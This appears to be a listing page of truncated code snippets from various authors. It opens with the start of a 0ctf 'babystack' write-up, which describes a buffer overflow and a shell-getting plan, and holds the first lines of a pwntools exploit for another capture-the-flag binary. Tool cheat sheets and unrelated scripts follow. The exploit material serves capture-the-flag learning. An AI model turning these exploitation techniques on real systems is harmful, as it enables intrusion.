ricardo2197

0ctf babystack with return-to dl-resolve

In this write-up I will discuss how I managed to solve the challenge "babystack" from 0ctf with a technique called return to dl-resolve. I did not know this kind of return-to attack before the contest. In the following sections a detailed explanation of the entire exploit will be presented.

1. Binary analysis

I downloaded the provided binary babystack and quickly fired up binaryninja alongside with gdb to analyze it. I quickly realized a buffer overflow vulnerability is present within sub_804843b. My first approach was to solve this challenge using a return-to-libc attack by leaking the base address of the library and call system in order to get a shell.
This technique is contingent on:

1. Leaking libc base address
2. Knowing the version of libc to get the offset of system.

However, the version of libc on the remote server was unknown and the ELF did not provide any function that can be us

fedochet

import javax.script.Invocable;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;
import java.io.InputStreamReader;

public class JavascriptBeautifierForJava {

    // my javascript beautifier of choice
    private static final String BEAUTIFY_JS_RESOURCE = "beautify.js";

jiulongw

# Credits to https://losfuzzys.github.io/writeup/2017/02/27/bkpctf2017-signed-shell-server/

from pwn import *  # noqa
import string
import random 

velf = ELF("./sss")
# this is the byte we'd need...
last_byte = velf.symbols['exec_command'] & 0xff
log.info("last byte of exec_command 0x{:x}".format(last_byte))

xposedbones

Number.prototype.map = function (in_min, in_max, out_min, out_max) {
  return (this - in_min) * (out_max - out_min) / (in_max - in_min) + out_min;
}

williballenthin

radare2

load without any analysis (file header at offset 0x0): r2 -n /path/to/file

• analyze all: aa
• show sections: iS
• list functions: afl
• list imports: ii
• list entrypoints: ie
• seek to function: s sym.main

subfuzion

Common Options

-#, --progress-bar Make curl display a simple progress bar instead of the more informational standard meter.

-b, --cookie <name=data> Supply cookie with request. If no =, then specifies the cookie file to use (see -c).

-c, --cookie-jar <file name> File to save response cookies to.

apolloclark

#!/bin/bash

# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update

# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*

elliotchance

import sys
import ply.yacc as yacc
import ply.lex as lex

tokens = (
    'INCREMENT',
    'DECREMENT',
    'SHIFT_LEFT',
    'SHIFT_RIGHT',
    'OUTPUT',

joyrexus

An introduction to curl using GitHub's API.

Basics

Makes a basic GET request to the specifed URI

curl https://api.github.com/users/caspyin

Includes HTTP-Header information in the output

vladignatyev

# The MIT License (MIT)
# Copyright (c) 2016 Vladimir Ignatev
#
# Permission is hereby granted, free of charge, to any person obtaining 
# a copy of this software and associated documentation files (the "Software"), 
# to deal in the Software without restriction, including without limitation 
# the rights to use, copy, modify, merge, publish, distribute, sublicense, 
# and/or sell copies of the Software, and to permit persons to whom the Software 
# is furnished to do so, subject to the following conditions:
#